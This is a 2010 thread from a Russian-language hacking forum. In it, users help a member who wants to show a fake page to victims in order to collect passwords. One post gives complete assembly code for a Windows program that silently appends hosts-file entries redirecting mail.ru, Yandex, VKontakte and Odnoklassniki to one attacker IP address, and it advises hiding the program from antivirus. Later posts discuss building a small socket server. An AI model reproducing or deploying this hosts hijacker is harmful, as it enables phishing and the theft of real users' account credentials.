ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
14.03.2010, 02:03
|
|
Познавший АНТИЧАТ
Регистрация: 19.07.2005
Сообщений: 1,000
Провел на форуме:
5868159
Репутация:
950
|
|
Сообщение от Pashkela
Сдается мне раз ТС так о размере печется решил троя на php написать )
Мне больше кажется что он хочет фейк повесить на ту же машину откуда пароли хочет утащить не более.
Вот тебе подменщик хостс на ASM правда надо от антивирей спрятать 
Код:
format PE GUI 4.0
entry start
include '..\INCLUDE\win32a.inc'
section '.text' code readable executable
start:
invoke GetSystemDirectory,SystemDirectory,MAX_DIR
cinvoke wsprintf,HostsFile,FileFormat,SystemDirectory
invoke CreateFile,HostsFile,GENERIC_WRITE,0,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0
xchg eax,ebx
inc eax
jz exit
invoke SetFilePointer,ebx,0,0,FILE_END
invoke WriteFile,ebx,HostsData,HostsDataSize,Bytes,0
invoke CloseHandle,ebx
exit:
ret
section '.data' data readable writeable
MAX_DIR = 128
SystemDirectory db MAX_DIR dup(?)
FileFormat db '%s\drivers\etc\hosts',0
HostsFile db MAX_PATH dup(?)
HostsData:
db '95.168.174.224 mail.ru',13,10
db '95.168.174.224 www.mail.ru',13,10
db '95.168.174.224 www.yandex.ru',13,10
db '95.168.174.224 yandex.ru',13,10
db '95.168.174.224 www.vkontakte.ru',13,10
db '95.168.174.224 vkontakte.ru',13,10
db '95.168.174.224 www.odnoklasniki.ru',13,10
db '95.168.174.224 odnoklasniki.ru',13,10
db '95.168.174.224 odnoklassniki.ru',13,10
db '95.168.174.224 www.odnoklassniki.ru',13,10
HostsDataSize = $-HostsData
Bytes dd ?
data import
library kernel32,'KERNEL32.dll',user32,'USER32.dll'
include '..\INCLUDE\api\kernel32.inc'
include '..\INCLUDE\api\user32.inc'
end data
section '.rsrc' readable resource from 'main.res'
|
|
|
14.03.2010, 02:13
|
|
Постоянный
Регистрация: 04.12.2007
Сообщений: 424
Провел на форуме:
2364957
Репутация:
479
|
|
если под фейк не проще ли проксировать просто а что надо логировать?
|
|
|
|
14.03.2010, 14:07
|
|
Участник форума
Регистрация: 02.02.2009
Сообщений: 146
Провел на форуме:
1093500
Репутация:
43
|
|
Сообщение от ntldr
если под фейк не проще ли проксировать просто а что надо логировать?
что значит проксировать?
мне надо чтоб независимо от хостинга у юзера показывалась моя страничка, сами понимаете абузы и пр.
|
|
|
|
15.03.2010, 04:53
|
|
Pagan Heart
Регистрация: 12.08.2004
Сообщений: 3,791
Провел на форуме:
6490435
Репутация:
2290
|
|
поподробнее рассскажи про сервер в 10 кб
Создаешь сокет, слушаешь, при соединении создаешь поток, которым выполняешь нужные действия.
Пара килобайт и ночь времени при реализации методом "копипастить-говнокодить".
P.S. Это(курсовая) было мной сделано в ночь перед экзаменом, с нуля. Я тогда первый раз щупал соксы на C. Успел.
|
|
|
|
15.03.2010, 19:20
|
|
Участник форума
Регистрация: 02.02.2009
Сообщений: 146
Провел на форуме:
1093500
Репутация:
43
|
|
а примеры есть какие то?
ато я с сокетами никогда не работал.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид